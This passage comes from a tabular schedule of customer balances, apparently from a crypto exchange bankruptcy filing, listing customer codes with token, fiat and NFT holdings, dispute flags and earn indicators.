| 07363453 | | DOGE[197.04340314], USD[0.00] | | |
| 07363454 | | DOGE[1], ETH[.00000001], ETHW[0], USD[0.01], USDT[0] | | |
| 07363455 | | BAT[0], BF_POINT[300], BRZ[0], DOGE[573.07629918], ETH[0], GRT[295.18998339], LINK[4.75869979], LTC[0.50185018], NFT (291351063603992657/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #5][1], NFT (294304434466617784/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #7][1], NFT (302228840082004205/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #9][1], NFT (302876252973724226/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #6][1], NFT (304153577630516085/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #14][1], NFT (304199532716568905/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #11][1], NFT (304357154374161964/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #6][1], NFT (307286168598611184/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #48][1], NFT (308401021010496080/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #8][1], NFT (309108367692506540/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #4][1], NFT (346171788164719953/Imola Ticket Stub #1857][1], NFT (349002229702550654/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #34][1], NFT (356048597574205409/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #6][1], NFT (368260077628250889/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #8][1], NFT (389946861908974463/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #10][1], NFT (390994113089034485/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #51][1], NFT (393007715975153982/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #5][1], NFT (400122059183821407/Hall of Fantasy League #6][1], NFT (402465999889064409/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #9][1], NFT (403084692394379645/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #9][1], NFT (407463076941098465/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #10][1], NFT (407907189646548008/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #35][1], NFT (416063471569877495/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #49][1], NFT (417071225059617118/APEFUEL by Almond Breeze #327][1], NFT (420438604778681258/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #66][1], NFT (426556829077383863/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #65][1], NFT (429796888402830397/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #65][1], NFT (433948192960609175/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #6][1], NFT (449311761227484461/DARTH VADER HOODIE #1][1], NFT (450897899380217467/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #5][1], NFT (452290573581189407/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #8][1], NFT (450084103310270941/Earl Campbell's Playbook: Cleveland Brown vs. Chicago Bears - November 16, 1980 #6][1], NFT (474086575922906251/Hall of Fantasy League #8][1], NFT (475474273681881933/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #4][1], NFT (477073119188363244/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #8][1], NFT (480871741587512393/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #6][1], NFT (494408635636527158/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #59][1], NFT (498426765617778001/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #11][1], NFT (499281005379937627/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #8][1], NFT (501350681599667716/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #5][1], NFT (506315440712854733/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #64][1], NFT (514889927148278514/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - September 29, 1985 #9][1], NFT (525597695895582713/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #5][1], NFT (530426911590331459/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #34][1], NFT (536099952149760586/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #4][1], NFT (536217361440497873/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #31][1], NFT (536841216112053374/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #50][1], NFT (544417007966934035/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #50][1], NFT (549701215889296702/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #72][1], NFT (551760400188721067/Doak Walker's Playbook: Detriot Lions vs. Cleveland Browns - November 28, 1952 #43][1], NFT (553864003839584505/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #5][1], NFT (557382045083356625/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #7][1], NFT (562240658717515818/Doak Walker's Playbook: Detriot Lions vs. Cleveland Browns - December 28, 1952 #7][1], NFT (563496663021309095/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #4][1], NFT (564726447227556836/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #12][1], NFT (567490378555251266/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #7][1], NFT (567655336647052698/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #3][1], NFT (568289035427221674/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #9][1], NFT (572343614619142859/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #7][1], NFT (574102254748070798/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #64][1], NFT (575734102289210534/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #7][1], SHIB[1], SOL[8.06153127], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07363456 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07363458 | | CUSDT[4], LTC[0], USD[0.00] | | |
| 07363459 | | USD[10.00] | | |
| 07363461 | | BAT[0], BTC[0], CAD[0.00], DAI[0], ETH[0], GBP[0.00], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07363462 | | CUSDT[2], USD[86.67] | | |
| 07363464 | | LINK[.24333624], UNI[.53932067], USD[0.00] | | |
| 07363465 | | TRX[173.80782173], USD[0.00] | | |
| 07363466 | | USD[10.00] | | |
| 07363468 | | USD[10.00] | | |
| 07363471 | | DOGE[1], ETH[0], TRX[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07363472 | | BRZ[1], CUSDT[5], DOGE[.30081913], TRX[3.0590681], USD[0.03], USDT[0] | | |
| 07363473 | | CUSDT[1], DOGE[.00015454], USD[0.00] | | |
| 07363476 | | USD[11.03] | Yes | |
| 07363477 | | USD[10.00] | | |
| 07363478 | | BTC[0.02894476], DOGE[0], ETH[0.44784271], ETHW[0.44784271], LTC[0], USD[2700.73] | | |
| 07363479 | | GRT[24.9], USD[0.52], USDT[.00044], YFI[.001992] | | |
| 07363480 | | BTC[.00019857], TRX[1], USD[0.06] | | |
| 07363481 | | BRZ[1], CUSDT[1], DOGE[2477.1511252], TRX[2], USD[0.39] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363482 | | ETH[0], ETHW[2.19591200], USD[46.69] | | |
| 07363483 | | USD[10.00] | | |
| 07363484 | Contingent, Disputed | AVAX[0], BTC[0], ETH[0], ETHW[0], MATIC[0], NFT (387684217139837333/Entrance Voucher #4047)[1], SOL[0.00040104], USD[0.00], USDT[0.00001415] | Yes | |
| 07363485 | | DOGE[.63952462], USD[0.02] | | |
| 07363487 | | USD[10.00] | | |
| 07363488 | | BAT[92.10775454], BTC[.00079563], DOGE[3014.03234817], LINK[4.27466912], USD[0.00] | Yes | |
| 07363490 | | CUSDT[4], DOGE[80.76033656], USD[0.00] | Yes | |
| 07363492 | | CUSDT[10], USD[0.00] | | |
| 07363493 | | USD[10.00] | | |
| 07363494 | | USD[10.00] | | |
| 07363495 | | BTC[0], CUSDT[1], ETH[0], SOL[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07363496 | | USD[10.00] | | |
| 07363497 | | DOGE[606.95226276], USD[0.00] | | |
| 07363498 | | USD[10.00] | | |
| 07363499 | | USD[10.91] | Yes | |
| 07363500 | | USD[10.00] | | |
| 07363501 | | DOGE[.136], ETH[0], USD[0.36], USDT[0] | | |
| 07363502 | | USD[10.00] | | |
| 07363503 | | BAT[1.01655549], BRZ[1], CUSDT[4], ETH[1.62411874], ETHW[1.62343656], GRT[325.70970882], MATIC[218.08546509], TRX[1], USD[0.00] | Yes | |
| 07363504 | | BRZ[1], CUSDT[3], DOGE[265.59112616], USD[0.87] | | |
| 07363505 | | USD[10.00] | | |
| 07363506 | | USD[10.00] | | |
| 07363507 | | BTC[0], CUSDT[13], DOGE[1], ETH[0], SHIB[489935.69907248], USD[0.01] | Yes | |
| 07363508 | | USD[10.00] | | |
| 07363509 | | BTC[.00123951], CUSDT[1], DOGE[1410.08023784], LTC[.15323216], TRX[1], USD[14.49] | | |
| 07363510 | | USD[10.00] | | |
| 07363512 | | DOGE[247.12606291], USD[0.00] | | |
| 07363513 | | USD[10.00] | | |
| 07363514 | | USD[10.00] | | |
| 07363515 | | BF_POINT[300], BRZ[0], BTC[0], MATIC[0], USD[0.21], USDT[0] | | |
| 07363517 | | TRX[160.93411688], USD[0.00] | Yes | |
| 07363518 | | USD[10.00] | | |
| 07363519 | | USD[10.00] | | |
| 07363520 | | USD[10.00] | | |
| 07363521 | | USD[10.00] | | |
| 07363522 | | USD[0.00] | | |
| 07363523 | | CUSDT[3], DOGE[25.47975195], USD[0.00] | | |
| 07363524 | | USD[0.00] | | |
| 07363526 | | BTC[0], CUSDT[0], DOGE[2.04724679], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07363527 | | DOGE[0], USD[10.00] | | |
| 07363528 | | GRT[1], USD[0.00] | | |
| 07363529 | | BTC[.00139319] | | |
| 07363530 | | USD[10.00] | | |
| 07363531 | | USD[10.00] | | |
| 07363532 | | CUSDT[1], DOGE[793.85170332], LTC[.04818605], USD[0.00] | Yes | |
| 07363533 | | USD[10.00] | | |
| 07363534 | | ETH[.00009784], ETHW[.00009784], USD[0.00] | Yes | |
| 07363535 | | BRZ[0], BTC[0], DOGE[0.68365102], USD[0.00], USDT[0] | | |
| 07363536 | | BAT[0], BTC[0], DOGE[3], ETH[0], USD[0.00], USDT[0.00013454] | | |
| 07363537 | | USD[10.00] | | |
| 07363538 | | DOGE[1], USD[0.00] | | |
| 07363539 | | USD[10.00] | | |
| 07363540 | | USD[10.00] | | |
| 07363541 | | BTC[.0000198], DOGE[99.99997633], ETH[.00062816], ETHW[.00062816], SHIB[15531.20361784], TRX[19.47637], USD[0.00] | | |
| 07363542 | | DOGE[0], USD[0.04], USDT[0] | Yes | |
| 07363543 | | USD[0.01] | | |
| 07363544 | | USD[10.00] | | |
| 07363545 | | BRZ[1], CHF[285.51], CUSDT[4], DOGE[2], GRT[1], SHIB[3], USD[1398.66] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363546 | | USD[0.00] | | |
| 07363547 | | BRZ[1], CUSDT[1], DOGE[2286.5833067], ETH[.03159667], ETHW[.03159667], USD[0.00] | | |
| 07363549 | | USD[0.00] | | |
| 07363550 | | USD[10.00] | | |
| 07363551 | | USD[10.00] | | |
| 07363552 | | USD[10.00] | | |
| 07363553 | Contingent, Disputed | BTC[0], ETH[.000025], ETHW[.000025], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07363554 | | CUSDT[4], SHIB[154428.25112107], USD[0.00] | | |
| 07363555 | | CUSDT[3], DOGE[157.52666285], USD[0.00] | | |
| 07363556 | | CUSDT[1], DOGE[0], SOL[0.00000306], TRX[1], USD[0.00] | | |
| 07363558 | | CUSDT[1], DOGE[184.38592868], TRX[1], USD[0.00] | | |
| 07363559 | | USD[10.00] | | |
| 07363560 | | USD[10.00] | | |
| 07363561 | | DOGE[3], USD[0.00] | Yes | |
| 07363562 | | AUD[0.00], CAD[0.00], CUSDT[1], DOGE[1], EUR[0.00], GBP[0.00], KSHIB[39.92975557], MATIC[2.77364138], SGD[0.00], SOL[.0357128], TRX[51.59964533], USD[1.09], USDT[0] | Yes | |
| 07363563 | | CUSDT[5], TRX[22741.28915435], USD[0.00] | Yes | |
| 07363566 | | BTC[0.00474562], SOL[19.96749242] | | |
| 07363567 | | USD[0.00] | | |
| 07363568 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07363569 | | USD[10.00] | | |
| 07363570 | | DOGE[98.01636442], USD[10.00] | | |
| 07363571 | | CUSDT[3], DOGE[21.5908036], TRX[1], USD[0.35] | | |
| 07363573 | | BTC[0], ETH[.00072609], ETHW[0.00072609], GRT[0], SOL[.00876867], USD[0.12], USDT[.008588] | | |
| 07363574 | | BRZ[1], CUSDT[1], DOGE[34779.86329464], TRX[1], USD[0.00] | | |
| 07363575 | | USD[10.00] | | |
| 07363576 | | BRZ[2], CUSDT[1], DOGE[4], LINK[7.62295166], TRX[6], USD[0.01], USDT[1] | | |
| 07363577 | | BTC[.00017758], USD[0.00] | | |
| 07363578 | | BRZ[1], BTC[.00000018], CUSDT[1], DOGE[1], ETH[.00001152], ETHW[.00001152], TRX[1], USD[0.00] | Yes | |
| 07363579 | | BRZ[1], CUSDT[17], ETH[.05103069], ETHW[.05039901], GRT[47.60008849], LINK[1.10567091], LTC[.10030821], SHIB[1], SUSHI[4.35730705], TRX[1682.35547455], UNI[2.25399685], USD[0.01], USDT[0.00000127] | Yes | |
| 07363582 | | USD[10.00] | | |
| 07363583 | | TRX[1], USD[0.01] | | |
| 07363584 | | CUSDT[3], DOGE[1764.50209446], ETH[.05105228], ETHW[.05105228], LINK[2.15191547], USD[0.00] | | |
| 07363585 | | USD[10.00] | | |
| 07363586 | | BRZ[1], BTC[0.35449084], DAI[3573.00040519], ETH[3.21512685], ETHW[3.21401733], GRT[6.49282558], LINK[30.10192302], TRX[1], USD[3664.25] | Yes | |
| 07363587 | | SHIB[763358.77862595], USD[0.00] | | |
| 07363588 | | CUSDT[7], DAI[.99252268], DOGE[3], ETH[.02612884], ETHW[.02612884], TRX[1], USD[0.00], USDT[2.99090176] | | |
| 07363589 | | USD[10.00] | | |
| 07363590 | | CUSDT[1], GRT[1], TRX[2], USD[0.01] | | |
| 07363591 | | CUSDT[2], DOGE[.00597573], USD[6.49] | | |
| 07363592 | | USD[0.00] | Yes | |
| 07363593 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07363594 | | USD[10.00] | | |
| 07363595 | | BRZ[1], CUSDT[6], DOGE[797.24330945], TRX[1], USD[7.87] | | |
| 07363596 | | BRZ[1], DOGE[1], USD[0.00], USDT[0.00000135] | Yes | |
| 07363597 | | BTC[0], DOGE[.00646616], USD[0.00] | | |
| 07363598 | | BTC[.00051503], USD[0.00] | | |
| 07363601 | | USD[10.00] | | |
| 07363602 | | DOGE[0], SHIB[1], TRX[0], USD[0.00] | | |
| 07363603 | | BTC[.00018594], DOGE[1], USD[0.00] | Yes | |
| 07363604 | | BRZ[1], CUSDT[2], DOGE[2080.83807609], GRT[137.98734521], TRX[2898.72997996], USD[0.00], USDT[0] | | |
| 07363605 | | USD[10.00] | | |
| 07363606 | | CUSDT[1], USD[0.01] | Yes | |
| 07363607 | | BRZ[2], CUSDT[19], DOGE[.61288363], SHIB[1], TRX[3], USD[1.00], USDT[0] | | |
| 07363608 | | USD[10.00] | | |
| 07363609 | | DOGE[2.71820928], USD[0.00] | | |
| 07363611 | | BAT[0], BCH[0], BRZ[0], DOGE[1], ETH[0], ETHW[0], LTC[0], NFT [34062377210633067 1/Red Panda #656][1], NFT [378974971924504073/Red Panda #1908][1], NFT [393203631498834861/Red Panda #9991][1], NFT [415713679050053672/Red Panda #3911][1], NFT [456288276877575489/Red Panda #7559][1], NFT [485814500702236496/Red Panda #5455][1], NFT [511462827381938403/Red Panda #9841][1], NFT [532796770298733894/Red Panda #411][1], NFT [576267814106116936/Red Panda #5294][1], SHIB[118208529.15700830], SOL[.0000081], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363612 | | USD[0.00], USDT[0.00000015] | | |
| 07363613 | | BAT[15.22], BRZ[11.4338], DOGE[510.7542], GRT[19.981], KSHIB[750], SHIB[599620], SUSHI[.2653], TRX[72.8562], UNI[.30898], USD[2.90] | | |
| 07363614 | | DOGE[621.834101991, USD[0.00] | | |
| 07363615 | | CUSDT[1], DOGE[1], USD[0.00], USDT[1] | | |
| 07363616 | | USD[10.00] | | |
| 07363617 | | SOL[3.62713931], TRX[77.46200299], UNI[0], USD[141.16], USDT[0.00347835] | | |
| 07363618 | | USD[10.00] | | |
| 07363619 | | USD[10.00] | | |
| 07363620 | | DOGE[2807.36230825], USD[0.00] | | |
| 07363621 | | DOGE[82.12533772], KSHIB[75.92642168], MATIC[33.67392287], SHIB[25786.84481033], USD[0.02] | | |
| 07363622 | | USD[10.00] | | |
| 07363623 | | USD[10.00] | | |
| 07363624 | | DOGE[2], USD[0.00] | Yes | |
| 07363625 | | USD[10.00] | | |
| 07363626 | | BTC[.02908775], DOGE[1], ETH[1.32692011], ETHW[1.32636278], NFT (326868276390200491/Crypto Avatar Art #14)[1], NFT (337428603832320620/Fortuo Distinctus #145)[1], SHIB[6], SOL[47.14764153], TRX[2], USD[0.00], USDT[3.19517377] | Yes | |
| 07363627 | | USD[10.00] | | |
| 07363629 | | USD[0.01] | | |
| 07363630 | | CUSDT[2], DOGE[63.63859589], ETH[.04011678], ETHW[.03961991], SUSHI[2.51846341], USD[0.03] | Yes | |
| 07363632 | | CUSDT[1], DOGE[55.50701646], USD[0.00] | | |
| 07363633 | | BTC[.0000819], USD[0.00] | | |
| 07363634 | | DOGE[0], ETH[0], LTC[0], UNI[0], USD[0.04], USDT[0] | | |
| 07363635 | | USD[10.00] | | |
| 07363636 | | USD[10.00] | | |
| 07363637 | | USD[10.00] | | |
| 07363638 | | CUSDT[2], DOGE[224.55544079], USD[10.00] | | |
| 07363639 | | USD[10.00] | | |
| 07363640 | | BTC[.00006717], USD[0.00] | Yes | |
| 07363642 | | USD[10.00] | | |
| 07363643 | | USD[10.00] | | |
| 07363644 | | CUSDT[4], TRX[1], USD[4.82] | Yes | |
| 07363646 | | DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.01], USDT[0.00000017] | Yes | |
| 07363647 | | CUSDT[2], DOGE[.7491921], TRX[1], USD[0.00] | | |
| 07363648 | | USD[0.04] | | |
| 07363649 | | USD[0.01], USDT[0] | | |
| 07363650 | | BAT[0], BTC[0], DOGE[0], GRT[0], LINK[0], TRX[0], USD[0.00] | | |
| 07363651 | | USD[10.00] | | |
| 07363652 | | BRZ[1], BTC[0], DOGE[2], USD[0.00] | | |
| 07363653 | | BAT[1], BRZ[3], CUSDT[15], ETHW[2.00810291], LINK[109.88939358], TRX[1], USD[0.00], USDT[0] | | |
| 07363654 | | DOGE[5], USD[0.01] | | |
| 07363655 | | CUSDT[1], DOGE[4468.52940702], LTC[1.11680117], USD[10.00] | | |
| 07363656 | | USD[10.00] | | |
| 07363657 | | BAT[1.01655549], BF_POINT[100], BRZ[2], CUSDT[9], DOGE[4.02480713], TRX[1.000008], USD[0.00], USDT[0] | Yes | |
| 07363658 | | CUSDT[2344.02095722], DOGE[13183.65449968], ETH[.05146396], ETHW[.05146396], USD[0.00] | | |
| 07363659 | | NFT (369085896895393608/Art of BitCoin #8)[1], TRX[0], USD[11.81], USDT[0] | Yes | |
| 07363660 | | USD[10.00] | | |
| 07363661 | | USD[10.00] | | |
| 07363662 | | DOGE[1], TRX[4686.77093777], USD[0.00] | | |
| 07363663 | | USD[10.00] | | |
| 07363665 | | DOGE[1], LINK[.00000058], USD[0.18] | | |
| 07363666 | | BRZ[4], CUSDT[5], DAI[.13354544], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07363667 | | USD[10.00] | | |
| 07363668 | | CUSDT[2], DOGE[1014.93124386], TRX[440.16499802], USD[0.00] | | |
| 07363671 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07363672 | | DOGE[1], USD[0.01] | | |
| 07363673 | | BTC[.00134659], CUSDT[1], DOGE[8926.13353756], ETH[.12524097], ETHW[.12524097], TRX[1], USD[0.62] | | |
| 07363674 | | USD[10.00] | | |
| 07363676 | | USD[10.00] | | |
| 07363677 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363678 | | DOGE[146.57658655], USD[10.00] | | |
| 07363680 | | CUSDT[3.00000009], DOGE[ 1002597], USD[0.39] | | |
| 07363682 | | USD[10.00] | | |
| 07363683 | Contingent, Disputed | ETH[.00000001], SOL[0] | | |
| 07363684 | | USD[10.00] | | |
| 07363686 | | CUSDT[1], DOGE[1], TRX[2410.61319359], USD[0.00] | Yes | |
| 07363687 | | USD[10.00] | | |
| 07363689 | | DOGE[.03556252], USD[0.00] | | |
| 07363691 | | BRZ[6.38079977], CUSDT[9], DOGE[7.00057537], ETH[.00000001], ETHW[1.08451966], NEAR[.0000274], SHIB[8], SOL[0], SUSHI[.00000001], TRX[6], USD[100.33], USDT[2.12702064] | Yes | |
| 07363693 | | USD[10.00] | | |
| 07363694 | | USD[0.01] | | |
| 07363695 | | DOGE[4], USD[0.00] | Yes | |
| 07363699 | | USD[0.00] | | |
| 07363700 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0.04123657], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07363703 | | USD[10.00] | | |
| 07363704 | | DOGE[1], GRT[6.24052321], TRX[1], USD[0.00] | Yes | |
| 07363705 | | USD[10.00] | | |
| 07363706 | | USD[10.00] | | |
| 07363707 | | USD[10.00] | | |
| 07363708 | | CUSDT[1], DOGE[20.01813522], USD[0.00] | | |
| 07363709 | | USD[10.00] | | |
| 07363710 | | USD[0.00] | | |
| 07363712 | | USD[10.00] | | |
| 07363713 | | CUSDT[1], GRT[1], TRX[1], USD[4.31] | | |
| 07363714 | | BAT[.93110352], BTC[0.00002029], CUSDT[2352.552], ETH[0], GRT[ 14360871], LINK[0.03265031], MKR[.000968], SUSHI[.30315119], TRX[0.86734718], UNI[.09475392], USD[0.00], USDT[101.29350871] | | |
| 07363715 | | USD[15.94] | | |
| 07363716 | | DOGE[737.49313343], ETH[.03203365], ETHW[.03203365], TRX[320.28781957], USD[10.00] | | |
| 07363717 | | BF_POINT[200], GRT[0], SOL[0], TRX[0], USD[0.51], USDT[0] | Yes | |
| 07363719 | | BAT[1], CUSDT[6], DOGE[2], TRX[9], USD[0.00] | | |
| 07363720 | | BTC[0.00016990], DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07363721 | | TRX[.6726488], USD[0.00] | | |
| 07363722 | | USD[10.00] | | |
| 07363723 | | USD[10.00] | | |
| 07363724 | | USD[0.00] | | |
| 07363725 | | SHIB[1700000], SOL[81.12621523], USD[-96.81] | | |
| 07363726 | | USD[10.79] | Yes | |
| 07363727 | | USD[0.00] | Yes | |
| 07363728 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07363730 | | DOGE[777.0803988], USD[0.00] | | |
| 07363731 | | USD[15.00] | | |
| 07363732 | | USD[10.00] | | |
| 07363733 | | USD[10.00] | | |
| 07363734 | | DOGE[167.45930081], USD[0.00] | | |
| 07363735 | | USD[10.00] | | |
| 07363736 | | BAT[460.11876323], BRZ[3], CUSDT[43], DOGE[6], MATIC[2136.16792165], SHIB[13], SOL[6.86609916], TRX[25350.3020416], USD[30.38], USDT[1.08515805] | Yes | |
| 07363737 | | DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07363739 | | ALGO[0], DOGE[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07363740 | | BTC[.00021652], USD[0.00] | | |
| 07363741 | | BTC[.00024888], CUSDT[1], USD[0.00] | Yes | |
| 07363743 | | LINK[.35647701], USD[0.00] | | |
| 07363744 | | GRT[6.77334793], USD[0.00] | | |
| 07363745 | | DOGE[1], USD[0.41] | | |
| 07363746 | | MATIC[14.78038880], USD[0.00] | Yes | |
| 07363747 | | USD[10.00] | | |
| 07363748 | | USD[10.00] | | |
| 07363750 | | DOGE[1], ETH[0.03539152], ETHW[0.03495376], SOL[1.79474218], TRX[1], USD[0.00], USDT[0.00000108] | Yes | |
| 07363751 | | USD[10.00] | | |
| 07363752 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363754 | | ETH[0], SOL[0] | | |
| 07363755 | | USD[10.00] | | |
| 07363756 | | USD[10.00] | | |
| 07363757 | | ETH[.00011633], USD[0.00] | Yes | |
| 07363758 | | BRZ[1], CUSDT[6], DOGE[42.99328830], GRT[84.31996941], SOL[1.15827619], SUSHI[7.50128495], USD[4.00] | | |
| 07363759 | | USD[0.00] | Yes | |
| 07363760 | | BTC[.00371273], TRX[.000055], USD[0.00], USDT[0] | | |
| 07363761 | | USD[10.00] | | |
| 07363762 | | BRZ[2], BTC[.00000006], CUSDT[2], ETH[.00000025], ETHW[.00000025], SHIB[2946810.07809046], TRX[1], USD[0.00] | | |
| 07363764 | | USD[10.00] | | |
| 07363765 | | USD[10.00] | | |
| 07363766 | | USD[10.00] | | |
| 07363767 | | DOGE[947.45470669], USD[0.00] | | |
| 07363768 | | CUSDT[2], DOGE[86.90419395], USD[0.00] | | |
| 07363770 | | USD[10.00] | | |
| 07363771 | | USD[10.00] | | |
| 07363772 | | BTC[0], USD[0.00] | | |
| 07363773 | | TRX[0], USD[0.00] | | |
| 07363774 | | USD[10.00] | | |
| 07363775 | | USD[10.00] | | |
| 07363776 | | GRT[5.09663859], USD[0.00] | Yes | |
| 07363777 | | USD[10.00] | | |
| 07363778 | | USD[10.00] | | |
| 07363779 | | BRZ[1], CUSDT[11], DOGE[5.1033649], GRT[1.00284423], TRX[4], USD[0.00], USDT[1.06662774] | Yes | |
| 07363780 | | USD[0.23] | | |
| 07363781 | | BTC[0], CUSDT[1], DOGE[437.46340894], USD[0.00] | | |
| 07363782 | | CUSDT[1], USD[0.00] | | |
| 07363783 | | NFT [296673163577209219/Diamond Starfish][1], NFT [306462535572733103/24K Gold Surfboard][1], NFT [307183504353354184/Gold Skull][1], NFT [314321084307191831/Gold Starfish][1], NFT [490476245252859324/Silver Starfish][1], NFT [516139778698205725/Megalodon Rogue Shark Tooth][1], NFT [525330408403424055/Silver Surfboard][1], NFT [550004943342746804/Diamond Surfboard][1], SOL[.00958], USD[1.15] | | |
| 07363784 | | DOGE[125.15801199], USD[0.00] | | |
| 07363785 | | USD[10.00] | | |
| 07363786 | | USD[10.00] | | |
| 07363787 | | USD[10.00] | | |
| 07363788 | | USD[10.00] | | |
| 07363789 | | USD[2.91] | | |
| 07363791 | | USD[1010.00] | | |
| 07363792 | | BTC[.00020447], USD[0.00] | | |
| 07363793 | | AAVE[.00000001], BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0.16800000] | | |
| 07363794 | | USD[10.00] | | |
| 07363795 | | USD[10.00] | | |
| 07363796 | | USD[10.00] | | |
| 07363797 | | USD[10.00] | | |
| 07363798 | | BTC[.0024697], DOGE[1.00000001], SOL[.00604203], USD[0.00] | Yes | |
| 07363799 | | USD[10.00] | | |
| 07363800 | | USD[10.00] | | |
| 07363801 | | USD[10.00] | | |
| 07363803 | | USD[10.00] | | |
| 07363804 | | DOGE[141.3618775], USD[0.00] | | |
| 07363805 | | USD[10.00] | | |
| 07363806 | | USD[10.00] | | |
| 07363807 | | USD[10.00] | | |
| 07363809 | | NFT [517118776866598262/FTX - Off The Grid Miami #670][1], USD[10.00] | | |
| 07363810 | | TRX[1], USD[0.00] | Yes | |
| 07363812 | | USD[10.00] | | |
| 07363813 | | BTC[0], ETH[0], GRT[0], USD[0.31] | | |
| 07363814 | | USD[10.00] | | |
| 07363816 | | DOGE[1], USD[0.01] | | |
| 07363817 | | BTC[0], CUSDT[9], DAI[0], DOGE[3], ETH[0], TRX[2], UNI[.00312923], USD[0.00], USDT[0] | Yes | |

